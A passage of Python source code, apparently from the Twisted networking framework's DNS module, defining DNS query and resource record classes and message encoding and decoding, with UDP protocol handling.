while 1:
l = ord(readPrecisely(strio, 1))
if l == 0:
if off > 0:
strio.seek(off)
return
if (l >> 6) == 3:
new_off = ((l&63) << 8
| ord(readPrecisely(strio, 1)))
if off == 0:
off = strio.tell()
strio.seek(new_off)
continue
label = readPrecisely(strio, l)
if self.name == '':
self.name = label
else:
self.name = self.name + '.' + label
def __eq__(self, other):
if isinstance(other, Name):
return str(self) == str(other)
return 0
def __hash__(self):
return hash(str(self))
def __str__(self):
return self.name
class Query:
"""
Represent a single DNS query.
@ivar name: The name about which this query is requesting information.
@ivar type: The query type.
@ivar cls: The query class.
"""
implements(IEncodable)
name = None
type = None
cls = None
def __init__(self, name='', type=A, cls=IN):
"""
@type name: C{str}
@param name: The name about which to request information.
@type type: C{int}
@param type: The query type.
@type cls: C{int}
@param cls: The query class.
"""
self.name = Name(name)
self.type = type
self.cls = cls
def encode(self, strio, compDict=None):
self.name.encode(strio, compDict)
strio.write(struct.pack("!HH", self.type, self.cls))
def decode(self, strio, length = None):
self.name.decode(strio)
buff = readPrecisely(strio, 4)
self.type, self.cls = struct.unpack("!HH", buff)
def __hash__(self):
return hash((str(self.name).lower(), self.type, self.cls))
def __cmp__(self, other):
return isinstance(other, Query) and cmp(
(str(self.name).lower(), self.type, self.cls),
(str(other.name).lower(), other.type, other.cls)
) or cmp(self.__class__, other.__class__)
def __str__(self):
t = QUERY_TYPES.get(self.type, EXT_QUERIES.get(self.type, 'UNKNOWN (%d)' % self.type))
c = QUERY_CLASSES.get(self.cls, 'UNKNOWN (%d)' % self.cls)
return '<Query %s %s %s>' % (self.name, t, c)
def __repr__(self):
return 'Query(%r, %r, %r)' % (str(self.name), self.type, self.cls)
class RRHeader(tputil.FancyEqMixin):
"""
A resource record header.
@cvar fmt: C{str} specifying the byte format of an RR.
@ivar name: The name about which this reply contains information.
@ivar type: The query type of the original request.
@ivar cls: The query class of the original request.
@ivar ttl: The time-to-live for this record.
@ivar payload: An object that implements the IEncodable interface
@ivar auth: Whether this header is authoritative or not.
"""
implements(IEncodable)
compareAttributes = ('name', 'type', 'cls', 'ttl', 'payload', 'auth')
fmt = "!HHIH"
name = None
type = None
cls = None
ttl = None
payload = None
rdlength = None
cachedResponse = None
def __init__(self, name='', type=A, cls=IN, ttl=0, payload=None, auth=False):
"""
@type name: C{str}
@param name: The name about which this reply contains information.
@type type: C{int}
@param type: The query type.
@type cls: C{int}
@param cls: The query class.
@type ttl: C{int}
@param ttl: Time to live for this record.
@type payload: An object implementing C{IEncodable}
@param payload: A Query Type specific data object.
"""
assert (payload is None) or (payload.TYPE == type)
self.name = Name(name)
self.type = type
self.cls = cls
self.ttl = ttl
self.payload = payload
self.auth = auth
def encode(self, strio, compDict=None):
self.name.encode(strio, compDict)
strio.write(struct.pack(self.fmt, self.type, self.cls, self.ttl, 0))
if self.payload:
prefix = strio.tell()
self.payload.encode(strio, compDict)
aft = strio.tell()
strio.seek(prefix - 2, 0)
strio.write(struct.pack('!H', aft - prefix))
strio.seek(aft, 0)
def decode(self, strio, length = None):
self.name.decode(strio)
l = struct.calcsize(self.fmt)
buff = readPrecisely(strio, l)
r = struct.unpack(self.fmt, buff)
self.type, self.cls, self.ttl, self.rdlength = r
def isAuthoritative(self):
return self.auth
def __str__(self):
t = QUERY_TYPES.get(self.type, EXT_QUERIES.get(self.type, 'UNKNOWN (%d)' % self.type))
c = QUERY_CLASSES.get(self.cls, 'UNKNOWN (%d)' % self.cls)
return '<RR name=%s type=%s class=%s ttl=%ds auth=%s>' % (self.name, t, c, self.ttl, self.auth and 'True' or 'False')
__repr__ = __str__
class SimpleRecord(tputil.FancyStrMixin, tputil.FancyEqMixin):
"""
A Resource Record which consists of a single RFC 1035 domain-name.
@type name: L{Name}
@ivar name: The name associated with this record.
@type ttl: C{int}
@ivar ttl: The maximum number of seconds which this record should be
cached.
"""
implements(IEncodable, IRecord)
showAttributes = (('name', 'name', '%s'), 'ttl')
compareAttributes = ('name', 'ttl')
TYPE = None
name = None
def __init__(self, name='', ttl=None):
self.name = Name(name)
self.ttl = str2time(ttl)
def encode(self, strio, compDict = None):
self.name.encode(strio, compDict)
def decode(self, strio, length = None):
self.name = Name()
self.name.decode(strio)
def __hash__(self):
return hash(self.name)
# Kinds of RRs - oh my!
class Record_NS(SimpleRecord):
"""
An authoritative nameserver.
"""
TYPE = NS
fancybasename = 'NS'
class Record_MD(SimpleRecord):
"""
A mail destination.
This record type is obsolete.
@see: L{Record_MX}
"""
TYPE = MD
fancybasename = 'MD'
class Record_MF(SimpleRecord):
"""
A mail forwarder.
This record type is obsolete.
@see: L{Record_MX}
"""
TYPE = MF
fancybasename = 'MF'
class Record_CNAME(SimpleRecord):
"""
The canonical name for an alias.
"""
TYPE = CNAME
fancybasename = 'CNAME'
class Record_MB(SimpleRecord):
"""
A mailbox domain name.
This is an experimental record type.
"""
TYPE = MB
fancybasename = 'MB'
class Record_MG(SimpleRecord):
"""
A mail group member.
This is an experimental record type.
"""
TYPE = MG
fancybasename = 'MG'
class Record_MR(SimpleRecord):
"""
A mail rename domain name.
This is an experimental record type.
"""
TYPE = MR
fancybasename = 'MR'
class Record_PTR(SimpleRecord):
"""
A domain name pointer.
"""
TYPE = PTR
fancybasename = 'PTR'
class Record_DNAME(SimpleRecord):
"""
A non-terminal DNS name redirection.
This record type provides the capability to map an entire subtree of the
DNS name space to another domain. It differs from the CNAME record which
maps a single node of the name space.
@see: U{http://www.faqs.org/rfcs/rfc2672.html}
@see: U{http://www.faqs.org/rfcs/rfc3363.html}
"""
TYPE = DNAME
fancybasename = 'DNAME'
class Record_A(tputil.FancyEqMixin):
"""
An IPv4 host address.
@type address: C{str}
@ivar address: The packed network-order representation of the IPv4 address
associated with this record.
@type ttl: C{int}
@ivar ttl: The maximum number of seconds which this record should be
cached.
"""
implements(IEncodable, IRecord)
compareAttributes = ('address', 'ttl')
TYPE = A
address = None
def __init__(self, address='0.0.0.0', ttl=None):
address = socket.inet_aton(address)
self.address = address
self.ttl = str2time(ttl)
def encode(self, strio, compDict = None):
strio.write(self.address)
def decode(self, strio, length = None):
self.address = readPrecisely(strio, 4)
def __hash__(self):
return hash(self.address)
def __str__(self):
return '<A address=%s ttl=%s>' % (self.dottedQuad(), self.ttl)
__repr__ = __str__
def dottedQuad(self):
return socket.inet_ntoa(self.address)
class Record_SOA(tputil.FancyEqMixin, tputil.FancyStrMixin):
"""
Marks the start of a zone of authority.
This record describes parameters which are shared by all records within a
particular zone.
@type mname: L{Name}
@ivar mname: The domain-name of the name server that was the original or
primary source of data for this zone.
@type rname: L{Name}
@ivar rname: A domain-name which specifies the mailbox of the person
responsible for this zone.
@type serial: C{int}
@ivar serial: The unsigned 32 bit version number of the original copy of
the zone. Zone transfers preserve this value. This value wraps and
should be compared using sequence space arithmetic.
@type refresh: C{int}
@ivar refresh: A 32 bit time interval before the zone should be refreshed.
@type minimum: C{int}
@ivar minimum: The unsigned 32 bit minimum TTL field that should be
exported with any RR from this zone.
@type expire: C{int}
@ivar expire: A 32 bit time value that specifies the upper limit on the
time interval that can elapse before the zone is no longer
authoritative.
@type retry: C{int}
@ivar retry: A 32 bit time interval that should elapse before a failed
refresh should be retried.
@type ttl: C{int}
@ivar ttl: The default TTL to use for records served from this zone.
"""
implements(IEncodable, IRecord)
fancybasename = 'SOA'
compareAttributes = ('serial', 'mname', 'rname', 'refresh', 'expire', 'retry', 'minimum', 'ttl')
showAttributes = (('mname', 'mname', '%s'), ('rname', 'rname', '%s'), 'serial', 'refresh', 'retry', 'expire', 'minimum', 'ttl')
TYPE = SOA
def __init__(self, mname='', rname='', serial=0, refresh=0, retry=0, expire=0, minimum=0, ttl=None):
self.mname, self.rname = Name(mname), Name(rname)
self.serial, self.refresh = str2time(serial), str2time(refresh)
self.minimum, self.expire = str2time(minimum), str2time(expire)
self.retry = str2time(retry)
self.ttl = str2time(ttl)
def encode(self, strio, compDict = None):
self.mname.encode(strio, compDict)
self.rname.encode(strio, compDict)
strio.write(
struct.pack(
'!LlllL',
self.serial, self.refresh, self.retry, self.expire,
self.minimum
)
)
def decode(self, strio, length = None):
self.mname, self.rname = Name(), Name()
self.mname.decode(strio)
self.rname.decode(strio)
r = struct.unpack('!LlllL', readPrecisely(strio, 20))
self.serial, self.refresh, self.retry, self.expire, self.minimum = r
def __hash__(self):
return hash((
self.serial, self.mname, self.rname,
self.refresh, self.expire, self.retry
))
class Record_NULL(tputil.FancyStrMixin, tputil.FancyEqMixin):
"""
A null record.
This is an experimental record type.
@type ttl: C{int}
@ivar ttl: The maximum number of seconds which this record should be
cached.
"""
implements(IEncodable, IRecord)
fancybasename = 'NULL'
showAttributes = compareAttributes = ('payload', 'ttl')
TYPE = NULL
def __init__(self, payload=None, ttl=None):
self.payload = payload
self.ttl = str2time(ttl)
def encode(self, strio, compDict = None):
strio.write(self.payload)
def decode(self, strio, length = None):
self.payload = readPrecisely(strio, length)
def __hash__(self):
return hash(self.payload)
class Record_WKS(tputil.FancyEqMixin, tputil.FancyStrMixin):
"""
A well known service description.
This record type is obsolete. See L{Record_SRV}.
@type address: C{str}
@ivar address: The packed network-order representation of the IPv4 address
associated with this record.
@type protocol: C{int}
@ivar protocol: The 8 bit IP protocol number for which this service map is
relevant.
@type map: C{str}
@ivar map: A bitvector indicating the services available at the specified
address.
@type ttl: C{int}
@ivar ttl: The maximum number of seconds which this record should be
cached.
"""
implements(IEncodable, IRecord)
fancybasename = "WKS"
compareAttributes = ('address', 'protocol', 'map', 'ttl')
showAttributes = [('_address', 'address', '%s'), 'protocol', 'ttl']
TYPE = WKS
_address = property(lambda self: socket.inet_ntoa(self.address))
def __init__(self, address='0.0.0.0', protocol=0, map='', ttl=None):
self.address = socket.inet_aton(address)
self.protocol, self.map = protocol, map
self.ttl = str2time(ttl)
def encode(self, strio, compDict = None):
strio.write(self.address)
strio.write(struct.pack('!B', self.protocol))
strio.write(self.map)
def decode(self, strio, length = None):
self.address = readPrecisely(strio, 4)
self.protocol = struct.unpack('!B', readPrecisely(strio, 1))[0]
self.map = readPrecisely(strio, length - 5)
def __hash__(self):
return hash((self.address, self.protocol, self.map))
class Record_AAAA(tputil.FancyEqMixin, tputil.FancyStrMixin):
"""
An IPv6 host address.
@type address: C{str}
@ivar address: The packed network-order representation of the IPv6 address
associated with this record.
@type ttl: C{int}
@ivar ttl: The maximum number of seconds which this record should be
cached.
@see: U{http://www.faqs.org/rfcs/rfc1886.html}
"""
implements(IEncodable, IRecord)
TYPE = AAAA
fancybasename = 'AAAA'
showAttributes = (('_address', 'address', '%s'), 'ttl')
compareAttributes = ('address', 'ttl')
_address = property(lambda self: socket.inet_ntop(AF_INET6, self.address))
def __init__(self, address = '::', ttl=None):
self.address = socket.inet_pton(AF_INET6, address)
self.ttl = str2time(ttl)
def encode(self, strio, compDict = None):
strio.write(self.address)
def decode(self, strio, length = None):
self.address = readPrecisely(strio, 16)
def __hash__(self):
return hash(self.address)
class Record_A6(tputil.FancyStrMixin, tputil.FancyEqMixin):
"""
An IPv6 address.
This is an experimental record type.
@type prefixLen: C{int}
@ivar prefixLen: The length of the suffix.
@type suffix: C{str}
@ivar suffix: An IPv6 address suffix in network order.
@type prefix: L{Name}
@ivar prefix: If specified, a name which will be used as a prefix for other
A6 records.
@type bytes: C{int}
@ivar bytes: The length of the prefix.
@type ttl: C{int}
@ivar ttl: The maximum number of seconds which this record should be
cached.
@see: U{http://www.faqs.org/rfcs/rfc2874.html}
@see: U{http://www.faqs.org/rfcs/rfc3363.html}
@see: U{http://www.faqs.org/rfcs/rfc3364.html}
"""
implements(IEncodable, IRecord)
TYPE = A6
fancybasename = 'A6'
showAttributes = (('_suffix', 'suffix', '%s'), ('prefix', 'prefix', '%s'), 'ttl')
compareAttributes = ('prefixLen', 'prefix', 'suffix', 'ttl')
_suffix = property(lambda self: socket.inet_ntop(AF_INET6, self.suffix))
def __init__(self, prefixLen=0, suffix='::', prefix='', ttl=None):
self.prefixLen = prefixLen
self.suffix = socket.inet_pton(AF_INET6, suffix)
self.prefix = Name(prefix)
self.bytes = int((128 - self.prefixLen) / 8.0)
self.ttl = str2time(ttl)
def encode(self, strio, compDict = None):
strio.write(struct.pack('!B', self.prefixLen))
if self.bytes:
strio.write(self.suffix[-self.bytes:])
if self.prefixLen:
# This may not be compressed
self.prefix.encode(strio, None)
def decode(self, strio, length = None):
self.prefixLen = struct.unpack('!B', readPrecisely(strio, 1))[0]
self.bytes = int((128 - self.prefixLen) / 8.0)
if self.bytes:
self.suffix = '\x00' * (16 - self.bytes) + readPrecisely(strio, self.bytes)
if self.prefixLen:
self.prefix.decode(strio)
def __eq__(self, other):
if isinstance(other, Record_A6):
return (self.prefixLen == other.prefixLen and
self.suffix[-self.bytes:] == other.suffix[-self.bytes:] and
self.prefix == other.prefix and
self.ttl == other.ttl)
return NotImplemented
def __hash__(self):
return hash((self.prefixLen, self.suffix[-self.bytes:], self.prefix))
def __str__(self):
return '<A6 %s %s (%d) ttl=%s>' % (
self.prefix,
socket.inet_ntop(AF_INET6, self.suffix),
self.prefixLen, self.ttl
)
class Record_SRV(tputil.FancyEqMixin, tputil.FancyStrMixin):
"""
The location of the server(s) for a specific protocol and domain.
This is an experimental record type.
@type priority: C{int}
@ivar priority: The priority of this target host. A client MUST attempt to
contact the target host with the lowest-numbered priority it can reach;
target hosts with the same priority SHOULD be tried in an order defined
by the weight field.
@type weight: C{int}
@ivar weight: Specifies a relative weight for entries with the same
priority. Larger weights SHOULD be given a proportionately higher
probability of being selected.
@type port: C{int}
@ivar port: The port on this target host of this service.
@type target: L{Name}
@ivar target: The domain name of the target host. There MUST be one or
more address records for this name, the name MUST NOT be an alias (in
the sense of RFC 1034 or RFC 2181). Implementors are urged, but not
required, to return the address record(s) in the Additional Data
section. Unless and until permitted by future standards action, name
compression is not to be used for this field.
@type ttl: C{int}
@ivar ttl: The maximum number of seconds which this record should be
cached.
@see: U{http://www.faqs.org/rfcs/rfc2782.html}
"""
implements(IEncodable, IRecord)
TYPE = SRV
fancybasename = 'SRV'
compareAttributes = ('priority', 'weight', 'target', 'port', 'ttl')
showAttributes = ('priority', 'weight', ('target', 'target', '%s'), 'port', 'ttl')
def __init__(self, priority=0, weight=0, port=0, target='', ttl=None):
self.priority = int(priority)
self.weight = int(weight)
self.port = int(port)
self.target = Name(target)
self.ttl = str2time(ttl)
def encode(self, strio, compDict = None):
strio.write(struct.pack('!HHH', self.priority, self.weight, self.port))
# This can't be compressed
self.target.encode(strio, None)
def decode(self, strio, length = None):
r = struct.unpack('!HHH', readPrecisely(strio, struct.calcsize('!HHH')))
self.priority, self.weight, self.port = r
self.target = Name()
self.target.decode(strio)
def __hash__(self):
return hash((self.priority, self.weight, self.port, self.target))
class Record_NAPTR(tputil.FancyEqMixin, tputil.FancyStrMixin):
"""
The location of the server(s) for a specific protocol and domain.
@type order: C{int}
@ivar order: An integer specifying the order in which the NAPTR records
MUST be processed to ensure the correct ordering of rules. Low numbers
are processed before high numbers.
@type preference: C{int}
@ivar preference: An integer that specifies the order in which NAPTR
records with equal "order" values SHOULD be processed, low numbers
being processed before high numbers.
@type flag: L{Charstr}
@ivar flag: A <character-string> containing flags to control aspects of the
rewriting and interpretation of the fields in the record. Flags
aresingle characters from the set [A-Z0-9]. The case of the alphabetic
characters is not significant.
At this time only four flags, "S", "A", "U", and "P", are defined.
@type service: L{Charstr}
@ivar service: Specifies the service(s) available down this rewrite path.
It may also specify the particular protocol that is used to talk with a
service. A protocol MUST be specified if the flags field states that
the NAPTR is terminal.
@type regexp: L{Charstr}
@ivar regexp: A STRING containing a substitution expression that is applied
to the original string held by the client in order to construct the
next domain name to lookup.
@type replacement: L{Name}
@ivar replacement: The next NAME to query for NAPTR, SRV, or address
records depending on the value of the flags field. This MUST be a
fully qualified domain-name.
@type ttl: C{int}
@ivar ttl: The maximum number of seconds which this record should be
cached.
@see: U{http://www.faqs.org/rfcs/rfc2915.html}
"""
implements(IEncodable, IRecord)
TYPE = NAPTR
compareAttributes = ('order', 'preference', 'flags', 'service', 'regexp',
'replacement')
fancybasename = 'NAPTR'
showAttributes = ('order', 'preference', ('flags', 'flags', '%s'),
('service', 'service', '%s'), ('regexp', 'regexp', '%s'),
('replacement', 'replacement', '%s'), 'ttl')
def __init__(self, order=0, preference=0, flags='', service='', regexp='',
replacement='', ttl=None):
self.order = int(order)
self.preference = int(preference)
self.flags = Charstr(flags)
self.service = Charstr(service)
self.regexp = Charstr(regexp)
self.replacement = Name(replacement)
self.ttl = str2time(ttl)
def encode(self, strio, compDict=None):
strio.write(struct.pack('!HH', self.order, self.preference))
# This can't be compressed
self.flags.encode(strio, None)
self.service.encode(strio, None)
self.regexp.encode(strio, None)
self.replacement.encode(strio, None)
def decode(self, strio, length=None):
r = struct.unpack('!HH', readPrecisely(strio, struct.calcsize('!HH')))
self.order, self.preference = r
self.flags = Charstr()
self.service = Charstr()
self.regexp = Charstr()
self.replacement = Name()
self.flags.decode(strio)
self.service.decode(strio)
self.regexp.decode(strio)
self.replacement.decode(strio)
def __hash__(self):
return hash((
self.order, self.preference, self.flags,
self.service, self.regexp, self.replacement))
class Record_AFSDB(tputil.FancyStrMixin, tputil.FancyEqMixin):
"""
Map from a domain name to the name of an AFS cell database server.
@type subtype: C{int}
@ivar subtype: In the case of subtype 1, the host has an AFS version 3.0
Volume Location Server for the named AFS cell. In the case of subtype
2, the host has an authenticated name server holding the cell-root
directory node for the named DCE/NCA cell.
@type hostname: L{Name}
@ivar hostname: The domain name of a host that has a server for the cell
named by this record.
@type ttl: C{int}
@ivar ttl: The maximum number of seconds which this record should be
cached.
@see: U{http://www.faqs.org/rfcs/rfc1183.html}
"""
implements(IEncodable, IRecord)
TYPE = AFSDB
fancybasename = 'AFSDB'
compareAttributes = ('subtype', 'hostname', 'ttl')
showAttributes = ('subtype', ('hostname', 'hostname', '%s'), 'ttl')
def __init__(self, subtype=0, hostname='', ttl=None):
self.subtype = int(subtype)
self.hostname = Name(hostname)
self.ttl = str2time(ttl)
def encode(self, strio, compDict = None):
strio.write(struct.pack('!H', self.subtype))
self.hostname.encode(strio, compDict)
def decode(self, strio, length = None):
r = struct.unpack('!H', readPrecisely(strio, struct.calcsize('!H')))
self.subtype, = r
self.hostname.decode(strio)
def __hash__(self):
return hash((self.subtype, self.hostname))
class Record_RP(tputil.FancyEqMixin, tputil.FancyStrMixin):
"""
The responsible person for a domain.
@type mbox: L{Name}
@ivar mbox: A domain name that specifies the mailbox for the responsible
person.
@type txt: L{Name}
@ivar txt: A domain name for which TXT RR's exist (indirection through
which allows information sharing about the contents of this RP record).
@type ttl: C{int}
@ivar ttl: The maximum number of seconds which this record should be
cached.
@see: U{http://www.faqs.org/rfcs/rfc1183.html}
"""
implements(IEncodable, IRecord)
TYPE = RP
fancybasename = 'RP'
compareAttributes = ('mbox', 'txt', 'ttl')
showAttributes = (('mbox', 'mbox', '%s'), ('txt', 'txt', '%s'), 'ttl')
def __init__(self, mbox='', txt='', ttl=None):
self.mbox = Name(mbox)
self.txt = Name(txt)
self.ttl = str2time(ttl)
def encode(self, strio, compDict = None):
self.mbox.encode(strio, compDict)
self.txt.encode(strio, compDict)
def decode(self, strio, length = None):
self.mbox = Name()
self.txt = Name()
self.mbox.decode(strio)
self.txt.decode(strio)
def __hash__(self):
return hash((self.mbox, self.txt))
class Record_HINFO(tputil.FancyStrMixin, tputil.FancyEqMixin):
"""
Host information.
@type cpu: C{str}
@ivar cpu: Specifies the CPU type.
@type os: C{str}
@ivar os: Specifies the OS.
@type ttl: C{int}
@ivar ttl: The maximum number of seconds which this record should be
cached.
"""
implements(IEncodable, IRecord)
TYPE = HINFO
fancybasename = 'HINFO'
showAttributes = compareAttributes = ('cpu', 'os', 'ttl')
def __init__(self, cpu='', os='', ttl=None):
self.cpu, self.os = cpu, os
self.ttl = str2time(ttl)
def encode(self, strio, compDict = None):
strio.write(struct.pack('!B', len(self.cpu)) + self.cpu)
strio.write(struct.pack('!B', len(self.os)) + self.os)
def decode(self, strio, length = None):
cpu = struct.unpack('!B', readPrecisely(strio, 1))[0]
self.cpu = readPrecisely(strio, cpu)
os = struct.unpack('!B', readPrecisely(strio, 1))[0]
self.os = readPrecisely(strio, os)
def __eq__(self, other):
if isinstance(other, Record_HINFO):
return (self.os.lower() == other.os.lower() and
self.cpu.lower() == other.cpu.lower() and
self.ttl == other.ttl)
return NotImplemented
def __hash__(self):
return hash((self.os.lower(), self.cpu.lower()))
class Record_MINFO(tputil.FancyEqMixin, tputil.FancyStrMixin):
"""
Mailbox or mail list information.
This is an experimental record type.
@type rmailbx: L{Name}
@ivar rmailbx: A domain-name which specifies a mailbox which is responsible
for the mailing list or mailbox. If this domain name names the root,
the owner of the MINFO RR is responsible for itself.
@type emailbx: L{Name}
@ivar emailbx: A domain-name which specifies a mailbox which is to receive
error messages related to the mailing list or mailbox specified by the
owner of the MINFO record. If this domain name names the root, errors
should be returned to the sender of the message.
@type ttl: C{int}
@ivar ttl: The maximum number of seconds which this record should be
cached.
"""
implements(IEncodable, IRecord)
TYPE = MINFO
rmailbx = None
emailbx = None
fancybasename = 'MINFO'
compareAttributes = ('rmailbx', 'emailbx', 'ttl')
showAttributes = (('rmailbx', 'responsibility', '%s'),
('emailbx', 'errors', '%s'),
'ttl')
def __init__(self, rmailbx='', emailbx='', ttl=None):
self.rmailbx, self.emailbx = Name(rmailbx), Name(emailbx)
self.ttl = str2time(ttl)
def encode(self, strio, compDict = None):
self.rmailbx.encode(strio, compDict)
self.emailbx.encode(strio, compDict)
def decode(self, strio, length = None):
self.rmailbx, self.emailbx = Name(), Name()
self.rmailbx.decode(strio)
self.emailbx.decode(strio)
def __hash__(self):
return hash((self.rmailbx, self.emailbx))
class Record_MX(tputil.FancyStrMixin, tputil.FancyEqMixin):
"""
Mail exchange.
@type preference: C{int}
@ivar preference: Specifies the preference given to this RR among others at
the same owner. Lower values are preferred.
@type name: L{Name}
@ivar name: A domain-name which specifies a host willing to act as a mail
exchange.
@type ttl: C{int}
@ivar ttl: The maximum number of seconds which this record should be
cached.
"""
implements(IEncodable, IRecord)
TYPE = MX
fancybasename = 'MX'
compareAttributes = ('preference', 'name', 'ttl')
showAttributes = ('preference', ('name', 'name', '%s'), 'ttl')
def __init__(self, preference=0, name='', ttl=None, **kwargs):
self.preference, self.name = int(preference), Name(kwargs.get('exchange', name))
self.ttl = str2time(ttl)
def encode(self, strio, compDict = None):
strio.write(struct.pack('!H', self.preference))
self.name.encode(strio, compDict)
def decode(self, strio, length = None):
self.preference = struct.unpack('!H', readPrecisely(strio, 2))[0]
self.name = Name()
self.name.decode(strio)
def exchange(self):
warnings.warn("use Record_MX.name instead", DeprecationWarning, stacklevel=2)
return self.name
exchange = property(exchange)
def __hash__(self):
return hash((self.preference, self.name))
# Oh god, Record_TXT how I hate thee.
class Record_TXT(tputil.FancyEqMixin, tputil.FancyStrMixin):
"""
Freeform text.
@type data: C{list} of C{str}
@ivar data: Freeform text which makes up this record.
@type ttl: C{int}
@ivar ttl: The maximum number of seconds which this record should be cached.
"""
implements(IEncodable, IRecord)
TYPE = TXT
fancybasename = 'TXT'
showAttributes = compareAttributes = ('data', 'ttl')
def __init__(self, *data, **kw):
self.data = list(data)
# arg man python sucks so bad
self.ttl = str2time(kw.get('ttl', None))
def encode(self, strio, compDict = None):
for d in self.data:
strio.write(struct.pack('!B', len(d)) + d)
def decode(self, strio, length = None):
soFar = 0
self.data = []
while soFar < length:
L = struct.unpack('!B', readPrecisely(strio, 1))[0]
self.data.append(readPrecisely(strio, L))
soFar += L + 1
if soFar != length:
log.msg(
"Decoded %d bytes in %s record, but rdlength is %d" % (
soFar, self.fancybasename, length
)
)
def __hash__(self):
return hash(tuple(self.data))
class Record_SPF(Record_TXT):
"""
Structurally, freeform text. Semantically, a policy definition, formatted
as defined in U{rfc 4408<http://www.faqs.org/rfcs/rfc4408.html>}.
@type data: C{list} of C{str}
@ivar data: Freeform text which makes up this record.
@type ttl: C{int}
@ivar ttl: The maximum number of seconds which this record should be cached.
"""
TYPE = SPF
fancybasename = 'SPF'
class Message:
"""
L{Message} contains all the information represented by a single
DNS request or response.
"""
headerFmt = "!H2B4H"
headerSize = struct.calcsize(headerFmt)
# Question, answer, additional, and nameserver lists
queries = answers = add = ns = None
def __init__(self, id=0, answer=0, opCode=0, recDes=0, recAv=0,
auth=0, rCode=OK, trunc=0, maxSize=512):
self.maxSize = maxSize
self.id = id
self.answer = answer
self.opCode = opCode
self.auth = auth
self.trunc = trunc
self.recDes = recDes
self.recAv = recAv
self.rCode = rCode
self.queries = []
self.answers = []
self.authority = []
self.additional = []
def addQuery(self, name, type=ALL_RECORDS, cls=IN):
"""
Add another query to this Message.
@type name: C{str}
@param name: The name to query.
@type type: C{int}
@param type: Query type
@type cls: C{int}
@param cls: Query class
"""
self.queries.append(Query(name, type, cls))
def encode(self, strio):
compDict = {}
body_tmp = StringIO.StringIO()
for q in self.queries:
q.encode(body_tmp, compDict)
for q in self.answers:
q.encode(body_tmp, compDict)
for q in self.authority:
q.encode(body_tmp, compDict)
for q in self.additional:
q.encode(body_tmp, compDict)
body = body_tmp.getvalue()
size = len(body) + self.headerSize
if self.maxSize and size > self.maxSize:
self.trunc = 1
body = body[:self.maxSize - self.headerSize]
byte3 = (( ( self.answer & 1 ) << 7 )
| ((self.opCode & 0xf ) << 3 )
| ((self.auth & 1 ) << 2 )
| ((self.trunc & 1 ) << 1 )
| ( self.recDes & 1 ) )
byte4 = ( ( (self.recAv & 1 ) << 7 )
| (self.rCode & 0xf ) )
strio.write(struct.pack(self.headerFmt, self.id, byte3, byte4,
len(self.queries), len(self.answers),
len(self.authority), len(self.additional)))
strio.write(body)
def decode(self, strio, length=None):
self.maxSize = 0
header = readPrecisely(strio, self.headerSize)
r = struct.unpack(self.headerFmt, header)
self.id, byte3, byte4, nqueries, nans, nns, nadd = r
self.answer = ( byte3 >> 7 ) & 1
self.opCode = ( byte3 >> 3 ) & 0xf
self.auth = ( byte3 >> 2 ) & 1
self.trunc = ( byte3 >> 1 ) & 1
self.recDes = byte3 & 1
self.recAv = ( byte4 >> 7 ) & 1
self.rCode = byte4 & 0xf
self.queries = []
for i in range(nqueries):
q = Query()
try:
q.decode(strio)
except EOFError:
return
self.queries.append(q)
items = ((self.answers, nans), (self.authority, nns), (self.additional, nadd))
for (l, n) in items:
self.parseRecords(l, n, strio)
def parseRecords(self, list, num, strio):
for i in range(num):
header = RRHeader()
try:
header.decode(strio)
except EOFError:
return
t = self.lookupRecordType(header.type)
if not t:
continue
header.payload = t(ttl=header.ttl)
try:
header.payload.decode(strio, header.rdlength)
except EOFError:
return
list.append(header)
# Create a mapping from record types to their corresponding Record_*
# classes. This relies on the global state which has been created so
# far in initializing this module (so don't define Record classes after
# this).
_recordTypes = {}
for name in globals():
if name.startswith('Record_'):
_recordTypes[globals()[name].TYPE] = globals()[name]
# Clear the iteration variable out of the class namespace so it
# doesn't become an attribute.
del name
def lookupRecordType(self, type):
"""
Retrieve the L{IRecord} implementation for the given record type.
@param type: A record type, such as L{A} or L{NS}.
@type type: C{int}
@return: An object which implements L{IRecord} or C{None} if none
can be found for the given type.
@rtype: L{types.ClassType}
"""
return self._recordTypes.get(type, None)
def toStr(self):
strio = StringIO.StringIO()
self.encode(strio)
return strio.getvalue()
def fromStr(self, str):
strio = StringIO.StringIO(str)
self.decode(strio)
class DNSMixin(object):
"""
DNS protocol mixin shared by UDP and TCP implementations.
@ivar _reactor: A L{IReactorTime} and L{IReactorUDP} provider which will
be used to issue DNS queries and manage request timeouts.
"""
id = None
liveMessages = None
def __init__(self, controller, reactor=None):
self.controller = controller
self.id = random.randrange(2 ** 10, 2 ** 15)
if reactor is None:
from twisted.internet import reactor
self._reactor = reactor
def pickID(self):
"""
Return a unique ID for queries.
"""
while True:
id = randomSource()
if id not in self.liveMessages:
return id
def callLater(self, period, func, *args):
"""
Wrapper around reactor.callLater, mainly for test purpose.
"""
return self._reactor.callLater(period, func, *args)
def _query(self, queries, timeout, id, writeMessage):
"""
Send out a message with the given queries.
@type queries: C{list} of C{Query} instances
@param queries: The queries to transmit
@type timeout: C{int} or C{float}
@param timeout: How long to wait before giving up
@type id: C{int}
@param id: Unique key for this request
@type writeMessage: C{callable}
@param writeMessage: One-parameter callback which writes the message
@rtype: C{Deferred}
@return: a C{Deferred} which will be fired with the result of the
query, or errbacked with any errors that could happen (exceptions
during writing of the query, timeout errors, ...).
"""
m = Message(id, recDes=1)
m.queries = queries
try:
writeMessage(m)
except:
return defer.fail()
resultDeferred = defer.Deferred()
cancelCall = self.callLater(timeout, self._clearFailed, resultDeferred, id)
self.liveMessages[id] = (resultDeferred, cancelCall)
return resultDeferred
def _clearFailed(self, deferred, id):
"""
Clean the Deferred after a timeout.
"""
try:
del self.liveMessages[id]
except KeyError:
pass
deferred.errback(failure.Failure(DNSQueryTimeoutError(id)))
class DNSDatagramProtocol(DNSMixin, protocol.DatagramProtocol):
"""
DNS protocol over UDP.
"""
resends = None
def stopProtocol(self):
"""
Stop protocol: reset state variables.
"""
self.liveMessages = {}
self.resends = {}
self.transport = None
def startProtocol(self):
"""
Upon start, reset internal state.
"""
self.liveMessages = {}
self.resends = {}
def writeMessage(self, message, address):
"""
Send a message holding DNS queries.
@type message: L{Message}
"""
self.transport.write(message.toStr(), address)
def startListening(self):
self._reactor.listenUDP(0, self, maxPacketSize=512)
def datagramReceived(self, data, addr):
"""
Read a datagram, extract the message in it and trigger the associated
Deferred.
"""
m = Message()
try:
m.fromStr(data)
except EOFError:
log.msg("Truncated packet (%d bytes) from %s" % (len(data), addr))
return
except:
# Nothing should trigger this, but since we're potentially
